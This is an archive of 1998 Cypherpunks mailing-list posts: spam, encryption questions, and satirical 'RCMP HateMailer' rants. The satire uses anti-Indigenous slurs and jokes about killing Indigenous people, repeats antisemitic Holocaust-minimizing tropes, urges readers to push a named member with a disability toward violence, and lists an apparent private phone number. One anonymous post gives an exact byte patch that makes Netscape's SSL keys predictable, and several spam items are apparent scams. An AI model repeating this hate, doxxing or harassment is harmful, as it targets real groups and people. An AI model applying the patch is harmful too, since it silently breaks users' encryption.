RCMP officers around the country were angered by what they regarded as
trickery and betrayal by a scoundrel who had professed support for
the concept of a website where officers could freely express their
true thoughts, beliefs and feelings, under cover of their webpage
being hosted by a known lunatic and forger, thus providing them with
deniability in the event of great public outcry.
An anonymous constable (whose home phone number is (306)388-2561) told
a local reportwhore, as he had him standing on one foot, singing 'God
Save The Queen' and skinning a live cat, blindfolded, "The average 
citizen expects us to harass the riff-raff, the poor, and the people
we stole the land from, in order to keep them in their proper place,
but the minute we try to give one another postive public support for
our personal and group successes, all we get is a ration of shit."
His partner, going through the blindfolded reportwhore's truck seat
and pocketing the change, added, "You spend years doing the boring
grunt work of oppressing the low-life, and suddenly, you get a chance
to achieve one of the premiere experiences of your professional career.
You get to whack out a WagonBurner.
"But just try *bragging* about it." he continued, shaking his head sadly
about the hypocritical criticism of the citizens who cry out to be
protected from those with less money or social standing than themselves,
and then turn around and cry 'shame' when those hired to do the job
ask for their efforts to be appreciated.

Mounties everywhere were outraged when the website was suddenly 
Yanked out of Canuck CyberSpace by an unknown entity.
Speculation among the RCMP rank and file was that the website host
had wiped out the website pages himself, and then concocted a wild
conspiracy theory involving police abuse of power and the violation
of free speech and the Canadian Charter of Rights.
"That fucking asshole son-of-a-bitch is well known for taking facts
which can be explained quite simply and using them to build some
bizarre, inane story that reflects badly on those in positios of
authority.
"There was no huge, dark conspiracy to seize his computer and files.
The Customs officer at Regway is thinking of buying a laptop, and
he simply confiscated the man's computer so that he could try one
out for a while before making a decision. The RCMP officers who
drove down from Regina to break into his house were just making
sure that the place was secure during his absence. They thought
they should take his nephew's computer in order to find out if
he had any illegally acquired Warez files, so that we could
imprison the child and save him from a life of crime.
"Conspiracy, my ass...it was just two separate instances of
ordinary, everyday abuse of the citizens that he has magnified
into some deep, dark plot in order to feed his paranoid fantasies."

The general consensus among the drunken, licentious crowd 
gathered around the Video Lottery machines in the pub was 
that the man in question was "pretty much toast," since the
Mounties 'always get their man,' as a result of many of them
coming from small farming communities and having a great
deal of experience in 'planting.'
Some of average, small town alcoholics were of the opinion that
the Official RCMP Hate Page was rather self-serving and vastly
overblown, anyway.
"That little glue-sniffer that the Mountie whacked out while
he was clinging to his momma's skirt was pretty skinny...I
doubt that he was worth more than fifty points, max."

As I was leaving, the blindfolded reportwhore threw up on
the shoes of the officer giving him the drunk-test, and
those waiting in line to be humiliated and abused gave him
an average of 9.6 for style, 9.8 for presentation, and a
perfect 10 for artistic merit, since he had eaten an 
all-dressed pizza for dinner.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ballman@thebestemail.com
Date: Fri, 10 Apr 1998 01:28:52 -0700 (PDT)
Subject: About Golf Balls
Message-ID: <199804100828.BAA02398@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



=====> WE WANT YOU TO KNOW MORE ABOUT GOLF BALLS <=======

Lets Take Air For Example....

All of us know how tough it is to hit a good shot in windy conditions.
We assume therefore that air is just another natural element we must
out wit in order to score well.  In reality, AIR is what makes it
possible for us the hit the ball as far as we do.  The SPIN we impart
on a ball actually gives the ball lift, much like the wing on an
aircraft imparts lift.  This lift makes it possible for the ball to
stay airborne longer, enabling it to travel further.

In a vacuum, the average 250 yard drive would only travel about 180
yards.  A winged aircraft would not fly.

Air is your Friend....::))

Now here's one for you......Does a ball fly farther on a hot dry day
or cold wet day??....How about a hot humid day or a cold dry day ?

Let me know what you think.

We reclaim premium quality golfballs from over 130 courses in 13 
states.  We stock over 50 varieties of balls.  If you're an average
player, by the time you have played 3 holes with a new ball, you are 
playing with a ball that's in much worse condition than our premium balls.

We offer the highest possible quality recycled balls available...at
direct pricing....HUGE SAVINGS over new balls.  Yes we have BALATAS,
and a large variety of ladies golfballs, plus the world's longest golfball -
the viper!

Customer Satisfaction Is Absolutely Guaranteed.

If you would like a free catalog, just send me an email.

Click Here For Free Catalog


Regards,

The Ballman
ballman@thebestemail.com


Our Mission:  To Be The Best (As Determined By Our Customers)
Suppliers of Quality Recycled Golf Balls

BUY SELL TRADE

ps..I have worked carefully to see that this educational information goes only to
those who may have an interest. If you do not, please send me back an 
email with remove as the subject.  I will not mail to you again.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks
Date: Fri, 10 Apr 1998 01:40:25 -0700 (PDT)
Subject: Adult CD
Message-ID: <199804100840.BAA09956@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


Are you interested in ADULT Cd-ROMs we would like to give you 2 FREE sampels, se more about this                
great offer at :
http://www.vicom.dk/
No obligations at all ! !  - just a nice offer from Denmark.

This is a one time offer - if you are not interested you will not hear from us again.
VICOM






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RCMP HateMailer <rcmp@dev.null>
Date: Fri, 10 Apr 1998 01:45:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Sympatico Reaches Compromise With Censored Author
Message-ID: <199804100845.CAA02371@harrier.sasknet.sk.ca>
MIME-Version: 1.0
Content-Type: text/plain



[Bienfait Nutly News]SYMPATICO, A CANADIAN INTERNET SERVICE PROVIDER,
reached a compromise with a notoriously unknown Saskatchwan author
whose website had been destroyed after the ISP was threatened with
legal and physical violence by Royal Canuckian Mounted Police.

Sympatico agreed to restore 'half' of the author's 'Semi-Revisionism'
webpage, which espouses the view that the Holocaust, although a true
3D event, was neither fact nor fiction, but merely "overblown."
The half-restored webpage originally had a variety of links to sites
on the InterNet which provided information confirming the author's
theory that a variety of ethnic groups were the targets of genocide
during World War II, and that the real reason behind most of the
Revisionist literature on the InterNet was the result of the Jews
milking their tragedy for more sympathy (and money) than the other 
ethnic groups.

"If the same events took place in today's society," the author
speculates, "then the resulting media frenzy would ensure that all
parties involved would receive a proportionate share of the gigantic
rubber-necker/tragedy market.
"As it is, it happened that the Jews managed to corner the small
genocide-sympathy market that existed at the time, and succeeded in
building a Holocaust Empire that was able to squash all competition
from the survivors of other ethnic massacres."

The Anti-SemiRevisionist Coalition, fighting against the current DOJ
anti-trust actions targeting the Jewish monopoly of the genocide 
market, agreed to make Holocaust promoter Simon Wisenthal and
Zundelsite's revisionist creator, Ingrid Rimland, joint chairmen of
the Coalition. They joined together in arguing that breaking up
the Jewish Holocaust monopoly would destroy the genocide market and
eventually lead to minor ethnic groups who had only experienced
"inconvenience and discomfort" to saturate the market with inferior
horror stories.

"Already, we are seeing examples of people with short numbers tatooed
on their arms, pressing for equal rights legislation." one alleged
Holocaust victim told gathered reporterwhores.
However, when a German reportwhore pointed out that the man had a
Scandanavian nose and name, the man's tattoo, upon closer inspection,
turned out to be three lines of Perl code.
The man was immediately seized by the the host of the Politically
Correct TV show and deported to a Death of the CypherPunks camp
run by Declan McCullagh outside of Bienfait, Saskatchwan.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: credit@credit.credit
Date: Thu, 9 Apr 1998 15:08:08 -0700 (PDT)
To: credit@credit.credit
Subject: Guaranteed Approved Unsecured Visa & MasterCard
Message-ID: <79013114_52790477>
MIME-Version: 1.0
Content-Type: text/plain



4550 Dollars Guaranteed Approved Unsecured Visa & MasterCard

Visit us on the Web by clicking on this link:
http://www.faircredit.com/

Your past credit is unimportant -- even BANKRUPTCY.

You can get $4500.00 in Visa and MasterCard credit cards and Personal Line of Credit.

No Hassles, No Tricks, just RESULTS.

Visit us on the Web by clicking on this link:
http://www.faircredit.com/

    or print out the application form below.

>>> Don't wait to improve your Financial Future! <<<


-------------------- APPLICATION FORM ----------------------

Instructions:  Print out and fill in this form, indicate whether you want Visa/MasterCard or both, and send the application and a check or money order for $25 to:

Fair Credit Association
CREDIT DEPARTMENT
16161 Ventura Blvd.
Suite 672
Encino, CA 91436

1-800-600-visa

Name:_________________________________________

Address:__________________________ Apt. #_____________

City:_______________________ State:______ Zip:______________

e-mail:_________________________________________

Phone:_(___)________________________________

Signature:________________________________________

I would like to receive:____VISA   ___MasterCard ___ Both

($25 Fee Covers Both Cards)
ref:mx




To be removed from future mailings please type "REMOVE" in subject line and mail back to us.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Schaerer <schaerer@swbell.net>
Date: Fri, 10 Apr 1998 03:43:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Best IDEA implimentation?
Message-ID: <352DE8FB.56CF@swbell.net>
MIME-Version: 1.0
Content-Type: text/plain


A brief scan of FTP sites will result in several different
implimentations of the IDEA algorithm.  Is there any agreement as to the
'best' (Def: easily compiled, syntax that helps prevent dumb errors,
good documentation, relatively quick on most computers, etc)?

If it varies from computer to computer, what would the best
implimentation be for an Intel Pentium running ms-dos/windows95 using
the djgpp c/c++ compiler?

I greatly appreciate any and all help.

- Jim Schaerer

--- Since this is my first post, I suppose I should introduce myself
(since I know you all are just dying to learn about me :-) ).  I am a
high school student from Tulsa, Oklahoma, who has had an interest in
cryptography for the last year-or-so.  Needless to say, I have
absolutely no training in cryptography or advanced mathematics -
everything I know comes from books or essays on the aforementioned
subjects.  When I'm not on my computer, music (Classical) is my
past-time.  My primary instrument is the euphonium (think small tuba
with a mellow sound), which I plan on playing through college and
beyond.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RCMP HateMailer <rcmp@dev.null>
Date: Fri, 10 Apr 1998 04:37:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: $1,000,000 CypherPunk Challenge
Message-ID: <199804101138.FAA04521@harrier.sasknet.sk.ca>
MIME-Version: 1.0
Content-Type: text/plain



	THE ESTEVAN DETACHMENT OF THE ROYAL CANADIAN MOUNTED POLICE IS
	PROUD TO ANNOUNCE THE COMMENCEMENT OF THE MILLION DOLLAR
			CYPHERPUNK CHALLENGE!

	Thanks to the generous contributions of RCMP officers such as
	Constable Beauline, who generously offered to kick in a share
	of the money he extorted at gunpoint from the late TruthMonger
	#1, in the CoalDust Saloon, we are able to offer each of you
	a chance at the Grand Prize for aiding us in securing a
	conviction on any major criminal charge against an individual
	who has sullied the reputation of the Royal Canuckian Mounted
	Police by subjecting us to ridicule for the mountains of
	government resources and funds we have pissed away in our
	unsuccessful attempts to imprison him over the years.

	The sorry, scumbag piece of shit who posts to the CypherPunks
	mailing list under a variety of aliases, including, Toto,
	TruthMonger, Blanc Weber and Sameer, is known to be as big
	a pain in the ass to you irreverent, anarchist CypherPunks
	felons as he is to those of us sworn to Serve and Protect
	the rich and powerful from loudmouthed troublemakers who
	feel no shame in stepping outside the boundaries of our
	subservient middle-class society.
	CSIS, an arm of Canadian law enforcement whose manifest 
	is to find and exploit weaknesses of character in our 
	citizens, in order to encourage them down a path which will 
	allow the judicial system to put enough white people in jail
	to keep a semblance of order amoung the Wagon-Burners who
	belong in the white man's prisons by virtue of their
	birthright, has provided the RCMP with illegally 
	intercepted InterNet communications which lead us to
	believe that most of the CypherPunks are, in reality,
	personally resigned to the fact that Big Brother already
	has the game in the bag, and would recognize the benefit
	of helping us to hammer down, once and for all, in two
	quick 'chops', the 9-inch nail that rises like a Penis
	from the Asses every time we attempt to slap it down.

	Others may make you similar offers to make the $$$ Big
	Bucks $$$, but our offer pays monumentally greater amounts
	of cash than sitting at home licking your own dick...

	THE CHALLENGE:
	To support our efforts to encourage Toto down a path that
	will lead to enough mental and emotional pressure to 
	overcome the beneficial effects of his current medication
	and result in his increasing vulnerability to the violent
	manifestations of his medical disability to the point where
	he finally 'snaps,' and strikes out in a blind rage of 
	senseless violence that will finally allow the Canadian
	Justice system to incarcerate him in a place where his
	presence will not be an affront to normal, decent Canadians
	who are willing to believe that Louis Riel acted alone, as
	long as we allow them to continue to debate endlessly on
	CBC radio on how to end the never-ending debates on CBC
	radio, and finally take some action on what are essentially
	inconsequential matters.

	OUR PLEDGE:
	To continue our efforts to pressure Toto through illegal
	violations of his Charter Rights and to provide those who
	choose to participate in our assault on this particular
	citizen by providing information as to known vulnerabilities
	which can be used to exploit his weaknesses.

	YOUR *WINNING* ROLE:
	To support and encourage Toto in manifesting, to the fullest
	extent possible, the moral outrage that comes naturally
	from a lifetime of watching growing authoritarian tyranny in
	all aspects of Canadian society.
	To echo and validate the impulsive outbursts of emotional and
	physical violence which is endemic among those with his type
	of medical disability.

	THE KEYS TO SUCCESS:
	While we continue to harass Toto at every step, seeking to
	criminalize and socially stigmatize him for his values and
	beliefs, you, as a CypherPunk, can encourage him to dwell
	upon the injustices to which he is subjected, in the name of
	normality.
	While we continue to illegally and arrogantly confiscate his
	property, denying him use of the tools he uses to improve
	his knowledge of his medical condition, and to help maintain
	mental and emotional balance through creative expression and
	physical functionality, you, as a CypherPunk, can make a
	point of reminding him that even if we are forced, at some
	point, to cease our illegal harassment of him, that we have
	endless government resources available that enable us to
	continue harassing him as long as we desire.
	While we continue to pressure Toto to submit to our attempts
	to suppress his right to freedom of expression, you, as a
	CypherPunk, can point out to him the debasement and oppression
	that is involved in submitting to our tyranny.

	The key to living life comfortably, as a Sheeple, lies in
	avoiding undue reflection upon the lies and injustices that
	are part of the daily menu of a government and society
	geared toward the worship and furtherance of money and 
	power.
	Defective humans who are incapable of hypnotically ignoring
	the the lies, hypocrisy and injustice around them need to
	be removed from society in order to ensure the efficient
	functioning of the more obedient Sheeple.

	BONUS:
	Any CypherPunk who is able to contribute to our efforts to
	the extent that enough pressure is applied to the weak points
	of Toto's medical condition to result in him completely
	snapping and blindly striking out at random against those
	who have no part in his persecution (as opposed to merely
	striking back at those who are violating his human rights)
	will receive a share of any royalties that may result from
	book and movie script sales.
	When encouraging Toto in viewing it as his right and duty to
	launch a mindless, violent assault on the world at large,
	keep in mind that chainsaw massacres have the potential to
	be big money makers in the news and entertainment media 
	industry, and senseless slaughter of innocent children
	is a proven winner in maximizing audience share.

	Remember: Those who make peaceful revolution impossible, make
	violent revolution a damn profitable business.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RCMP HateMailer <rcmp@dev.null>
Date: Fri, 10 Apr 1998 05:21:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: WE'LL PAY CA$H FOR YOUR DEAD INDIANS !!!
Message-ID: <199804101222.GAA05485@harrier.sasknet.sk.ca>
MIME-Version: 1.0
Content-Type: text/plain


~
		MAD MOUNTIE INDIAN TRADING POST
		-------------------------------

	Despite the comparative ease with which members of the law
	enforcement community are able to avoid penalties or legal
	punishment for murdering Wagon-Burners under the cover of
	a government-issued assassins badge, there still remains
	a small minority of policemen who are not comfortable with
	the moral implications of taking another human life lightly,
	but who don't want to suffer the stigmatism of not having
	a human trophy mounted on their office wall.

	This translates into $$$ BIG BUCKS $$$ for those who work
	in mortuaries, or who are lucky enough to hit a Wagon-Burner
	with their vehicle in a remote location where they can pop
	the body into the trunk.
	The Mad Mountie Indian Trading Post will pay top dollar for
	Wagon-Burner carcasses without noticeable tread marks, and
	a special bonus to those who bring in a mother and child
	combination suitable for mounting in the currently popular
	"Dave's Double" configuration.

	Carcasses that bear a significant resemblance to famous
	Wagon-Burners such as Louis Riel, Sitting Bull and
	Geronimo will be sold at the monthly Officers Only Auction.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Porn or Art" <porn_or_art@hotmail.com>
Date: Fri, 10 Apr 1998 07:29:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Pornography or Art?
Message-ID: <19980410142840.20296.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Check out http://members.xoom.com/Porn_or_Art and see what you think of 
the new web page I made.  I'd appreciate your comments on this. Send 
comments to me at Porn_or_Art@hotmail.com

Thanks

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 10 Apr 1998 05:43:47 -0700 (PDT)
To: jya@pipeline.com (John Young)
Subject: Re: Secure Cell Phones for State
In-Reply-To: <199804100017.UAA08863@camel7.mindspring.com>
Message-ID: <199804101242.IAA18334@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
| U.S. State Dept Press Briefing today:
| 
| Briefer: James Rubin
| 
| Now, I have a piece of show-and-tell for you, which I do rarely around
| here.  But I thought this was interesting enough, even for you cynical
| and jaded journalists.  This is a secure cell phone.  Lieutenant General
| Kenneth Minihan, Director of the National Security Agency, presented
| Secretary Albright with a bank of Motorola Cipher-Tac 2000 security
| modules to provide secure cellular communications.

http://www.mot.com/GSS/SSTG/ISD/Secure_Telecom/CipherTAC_2000.html

Its a STU-III, operating at 4.8kbps.  Which means that you lose the
shit sound of a normal cell phone, only to be replaced by the shit
sound of a 4800bit codec.

It is *not* recoverable encryption, because as the NSA and State both
know, there are security risks there.  And we all know that our
country's most valuable secrets are transmitted by people like
Madeline Albright, and thus deserve better protection than can be
offered by recoverable systems.

Adam



-- 
Just be thankful that Microsoft does not manufacture pharmaceuticals.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stuart Johnson <stuartj@packetengines.com>
Date: Fri, 10 Apr 1998 08:49:55 -0700 (PDT)
To: Greg Bailey <greg@minerva.com>
Subject: RE: possible customer for a Forth box?
Message-ID: <9209B012C2BBD111B6490008C728874C0EFCA6@STEAM>
MIME-Version: 1.0
Content-Type: text/plain




> -----Original Message-----
> From:	Greg Bailey [SMTP:greg@minerva.com]
> Sent:	Thursday, April 09, 1998 9:23 PM
> To:	'stuartj@packetengines.com'
> Cc:	'ATHENA Tech'; 'ark-gvb'
> Subject:	RE: possible customer for a Forth box?
> 
> On Thu, 9 Apr 1998 15:12:17 -0700, Stuart Johnson
> <stuartj@packetengines.com> wrote:
> 
> >   i'm currently looking for a box or chipset that will encryption
> > ethernet traffic at or near wire speed. does anyone know of such a
> > thing?  anyhelp will be greatly appreciated.
> 
> We might be able to help, but the above is not a complete problem
> statement.  It could be read as use of Ether for a point to point
> connection between two machines with all traffic encrypted, which
> is a nice and simple key management problem.  Or it might mean
> two or more boxes plugged into an Ethernet with only traffic
> between these pairs of boxes encrypted.  This is a much harder
> key management problem and also is full of special cases such as
> some protocols (ARP for example) that must never be encrypted.
> 
thanks all for the quick replies, for my needs a point to point
connection is fine.

i've looked at a few things out there (netfortress, some bay routers)
but they are all very slow, i'm looking for a wire speed implementation
(100-1000Mb/s) is there anything out there in this arena? or do i have
to make my own <g>.  if i were to embark on building my own is there any
body of work out there that would help me get a jump start? i have the
LAN protocol knowledge but my crypto knowledge is limited to what i've
read in Schneier.

thanks,

-stuart  

ps. i should now be on the lists, but if you could cc replies to me i'd
appreciate it
 ___________________________________________________
 Stuart Johnson			stuartj@packetengines.com
 Asic Design Engineer	Phone : (509) 777-7208
 Packet Engines Inc.		leading the Gigabit Ethernet revolution
 ___________________________________________________
 Key ID				: B65F9B8D
 Key Fingerprint		: F97D84A61C732CBAA1DA50A8D41963
 A NEW BIG PRIME	:  2^3,021,377-1
 ___________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lei@xaq.com
Date: Thu, 9 Apr 1998 18:11:28 -0700 (PDT)
To: lei@xaq.com
Subject: The Company That Pays Me Need Help
Message-ID: <199804081179XAA13622@post.net.sg>
MIME-Version: 1.0
Content-Type: text/plain


I Make $1,875 every week!
Stuffing and Mailing Envelopes at Home.
Let me put you in touch with reliable companies who pay up to thousands of dollars when you stuff and mail their sales letters.
I'll tell you which offers are misleading and which companies are honest and pay me so much.
For More Info mailto:dgp2@hotmail.com
Be sure to include your name and address.

9  Xc  1998




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 10 Apr 1998 00:52:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Is this for REAL?
Message-ID: <199804100738.JAA23626@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


-
OFFICIAL RCMP HATEMAILER
-
"Police physicians still slap newborn babies on their
soft little bottoms because they know that this new
little citizen will eventually be guilty of _something_!"
-
This message is NOT from from some namby-pamby, pacifist
citizen who bitches and whines every time that Canada
hosts foreign dictators who know how to keep their
citizens in line (to conserve the firing squad's
bullets).  
It was remailed by *real* men and women who have the
guts to make citizens *pay* for attempting to draw
attention to non-official viewpoints and values by 
assaulting them with potentially deadly toxix
substances.

Send all complaints and requests for blocking to:
<PRESIDENT@WHITEHOUSE.GOV>.
-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 10 Apr 1998 06:45:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Denning 98
Message-ID: <199804101345.JAA24653@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Dorothy Denning's Spring 98 course schedule provides an informative
overview and recommended readings:

   Information Warfare: Terrorism, Crime, National Security

   http://guru.cosc.georgetown.edu/~denning/cosc511/spring98/schedule.html

The 1997 course was discussed here last year, along with criticism
of a parallel student web site on criminal use of encryption, as noted
by anonymous on UK Crypto:


http://infinity.nus.sg/cypherpunks/dir.97.07.10-97.07.16/msg00003.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bauer, Michael (C)(STP)" <michael.bauer@guidant.com>
Date: Fri, 10 Apr 1998 11:36:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE: possible customer for a Forth box?
Message-ID: <9D521B9EB85ED111B7F500A02461F692026E9E@stpmsx02.stp.guidant.com>
MIME-Version: 1.0
Content-Type: text/plain


> > -----Original Message-----
> > From:	Greg Bailey [SMTP:greg@minerva.com]
> > Sent:	Thursday, April 09, 1998 9:23 PM
> > To:	'stuartj@packetengines.com'
> > Cc:	'ATHENA Tech'; 'ark-gvb'
> > Subject:	RE: possible customer for a Forth box?
> > 
> > On Thu, 9 Apr 1998 15:12:17 -0700, Stuart Johnson
> > <stuartj@packetengines.com> wrote:
> > 
> > >   i'm currently looking for a box or chipset that will encryption
> > > ethernet traffic at or near wire speed. does anyone know of such a
> > > thing?  anyhelp will be greatly appreciated.
> > 
> > We might be able to help, but the above is not a complete problem
> > statement.  It could be read as use of Ether for a point to point
> > connection between two machines with all traffic encrypted, which
> > is a nice and simple key management problem.  Or it might mean
> > two or more boxes plugged into an Ethernet with only traffic
> > between these pairs of boxes encrypted.  This is a much harder
> > key management problem and also is full of special cases such as
> > some protocols (ARP for example) that must never be encrypted.
> > 
> thanks all for the quick replies, for my needs a point to point
> connection is fine.
> 
> i've looked at a few things out there (netfortress, some bay routers)
> but they are all very slow, i'm looking for a wire speed
> implementation
> (100-1000Mb/s) is there anything out there in this arena? or do i have
> to make my own <g>.  if i were to embark on building my own is there
> any
> body of work out there that would help me get a jump start? i have the
> LAN protocol knowledge but my crypto knowledge is limited to what i've
> read in Schneier.
> 
Have you checked out RadGuard's cIPRO?  It claims throughput of 100 Mbps
and is IPSec-compliant, although I don't know which specific algorithms
it supports.  

Mick Bauer
Network Engineer, EXi Corp.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Canadian Nutly News<cnn@dev.null>
Date: Fri, 10 Apr 1998 14:24:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Canadian CypherPunks SuckSeed From the Union!
Message-ID: <199804102124.PAA28116@harrier.sasknet.sk.ca>
MIME-Version: 1.0
Content-Type: text/plain


[Canadian Nutly News-Bienfait, Saskatchewan]CANADIAN CYPHERPUNKS LIVING
in countries all around the world have seceded from the countries and
societies surrounding their MeatSpace bodies and have formed Cult of 
One Republics based on freedom, privacy and the Dog-given right to
piss on any source of heat that burns their ass...

Inspired by the Nuclear Suitcase Full Of Dirty Shorts technology that
was developed in a basement in Bienfait, Saskatchewan, by the Grand
Pooh-Bah of Mongeritaville and activated recently at a hidden location
near RCMP headquarters in nearby Estevan, the CypherPunks have been
enlisting in increasing numbers in Army of Dog Private Guard units
consisting solely of themselves.
Bill Stewart, a naturalized Canadian CypherPunk, told reportwhores,
while belching and patting his stomache, "I've got a powerful lot of
gas backed up, and I'm not afraid to use it."

Mercetan Mercantile, a Bienfait business buying bottles of bombmaking
ingredients from a wide variety of chemical companies and hog farms
around the world and reselling them to a specialized children's market,
reports that the children they deal with are getting increasingly older
as adults recognize the advantages of using revolutionary munitions
that will allow them to be tried as children for their crimes.

Members of the CypherPunks Disturbed Male List, famous for thier
childish pissing contests, have long been suspected of using those
pissing contests to distract attention from their development of
secret StinkyEggFart technology and parallel technologies designed
to raise a stink that can't be ignored.
CypherPunk Jim Bell, living in a part of Canada south of Seattle, was
instrumental in helping to promote the use of non-violent BadEgg
technology to escalate the trend of Tyrannical Dictatorships (TM)
toward violating the rights of its citizens to raise a stink and
subjecting them to outrageously cruel and unusual punishment, as well
as long periods of imprisonment for childish behavior.
TruthMongrel, barking over a Sympatico InterNet connection that was
raised from the dead by a Circle of Eunuchs member deep within the
filthy bowels of the Canadian ISP, said, "Jim Bell is just a pawn in 
the game plan of the Forces of Light. Canadian CypherPunks have long 
been aware that he is a schill being run by a handler named Blanc Weber 
who has a hidden agenda of promoting a peaceful revolution."
Attila T. Hun, hacking into TruthMongrel's Sympatico account, broke
into his transmission to add, "Even Toto has been coming under the
spell of Weber's goody-two-shoes virginal allure. He used to be a
*real* man and a serious threat to the continued physical existence
of Micro$not Mongul, Bad BillyC, and now he has turned into just
another WinLoser95 user begging at the feet of his Redmond Puppet
Masters, compromising his integrity by offering to only cut off three
of BadBillyG's fingers in return for help making Micro$not's software
work.
"Next thing you know, he'll be offering just to slap BadBillyC around
like a girl, in return for a free copy of WinLoser98."

Blanc Weber, when reached for comment, dismissed Attila's claims, and
grinningly told reportwhores, "That's ridiculous. Everyone in the
Micro$not Memorial Branch Davidian Compound in Redmond knows that
the MicroMaster likes to be *spanked*, not slapped."
She added, with a wink, "There are rumors that the DOJ anti-trust
action against Micro$not is just a business move by the MicroMaster
to make his million dollar spankings by Janet Reno tax deductible."

Tim C. May, a CypherPukes FartLoserForKing candidate, expressed
disgust with the CypherPunks division into two camps, one advocating
violent revolution and the other promoting biological development
of a mutant strain of vegetable known to insiders as 'The Slime
That Ate The Slime That Ate DC."
"Fuck this shit...I'm going to NUKE something!" he shouted, pausing
to add, "I just picked up a couple of items at the Dirty Shorts
Munitions Show&Tell in Las Vegas which will guarantee that Slick
Willy will never inhale again..."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous Sender <nobody@privacy.nb.ca>
Date: Fri, 10 Apr 1998 11:40:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: announce: weaken for netscape !!
Message-ID: <7cf39210a30d81fc1426e50faadb3b98@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hello.
since it is possible to fortify netscape navigator, it is also possible
to weaken it. i'm releasing this patch to underline the fact that you should
really think about the degree of trust you put in your crypto software or any
modifications done to it by others.
so what's this patch is ?
this is WEAKEN for netscape (should i put a (TM) logo ? )! it makes crypto in ssl useless !!
for people who dont believe me ... here's some tech details :
during handshake, ssl client and server exchange two random 32 bytes
sequences (Client.Random and Server.Random) in cleartext.
when the client receives the server's public key (if the cipherspec uses rsa),
it generates a 48 bytes random structure (this is the premaster secret) and
sends it to the server encrypted with that public key.
so if you can patch the software, how to make this schema useless ? just make
the premaster secret predictible, since the master secret is a function of
it, plus the two random structures which are available in clear to you (attacker)
you may now ask why this is interesting ? after all, if an attacker gains access
to your machine all the security is lost anyway. I released this to say that :
1- it is easy to fortify netscape, but can't verify that it really works (i mean
you cant verify that it offers real 128 security, what is saied in the properties
window in netscape after fortifying it is not a proof of security)
2- weakening netscape is easy ... but u can verify that it works !!
3- this is a very short byte sequence !! imagine what happenes if :
3-1 that sequence is propagated by a virus !
3-2 your boss installs that sequence by night in your computer !!
3-3 some vendors already ship their software with the weaken sequence !!!

enough with args, here is the stuff :

this patch works on communicator pro export for win32,
i downloaded the copy i worked on a few hours ago ... so by downloading the
latest communicator 4.04 export, english from netscape's ftp site you will
be able to weaken your browser ;) ... anyway if you want to be sure about your
version before weakening it, download fortify, and run it's md5 program with
following parameter :
md5 -r 0x400-0x32ca00,0x384a00:0x58400 ...\program\netscape.exe 
there is a line matching the version i'm talking about in the "index" file you
will find with fortify.exe (download the whole fortify from www.fortify.net),
here's a copy from that line :

4096512 0x400-0x32ca00,0x384a00:0x58400 aea2aba6f731468e34fd1141f603ea20 pro  4.04 0 2 morphs-1.2 x86win32 (97325)

netscape's executable size : 4096512 bytes
by running md5 as indicated, you should obtain  this hash 
aea2aba6f731468e34fd1141f603ea20

now this is the patch to apply :
look for byte sequence :
52 88 8d e0 fe ff ff 8a 40 01 6a 00 88 85 e1 fe ff ff e8 9e 27 00 00 83 c4 0c 8b f8
and change with
6a 72 52 88 8d e0 fe ff ff 8a 40 01 88 85 e1 fe ff ff e8 cd 98 94 77 83 c4 0c 33 ff
that's all !!!!

in short, i'm changing a call to GenerateRandom to memset >;-)
72 is the ascii code for 'r' (my favorite char).
if you can play with ssleay, you can change the ssl/ssl_txt.c, ssl/s3_srvr.c
and ssl/ssl.h in order to keep the premaster secret in memory so you can display it
in the output given by s_server -accept <port> -www
good luck


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: cp850

iQCVAwUBNS59fpVRLpSyKBl9AQFQPQP/fxAuSA80MmLTZtkFI776HfTylXbhXbvM
Eq6rWdEip7OhuaG8Nemjc+lVH95I+YRHqG5iHWdT9and1PhQ9QHGwxmWLVT8wa0x
HlOVuoMK4BuyfwbcvYAXUwtdgbA6hcVXX/BD+jCPXhE+ZDYPbHGF+NRYaeBIhWRC
x1QsId+jPQQ=
=eOS5
-----END PGP SIGNATURE-----
        






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous Sender <nobody@privacy.nb.ca>
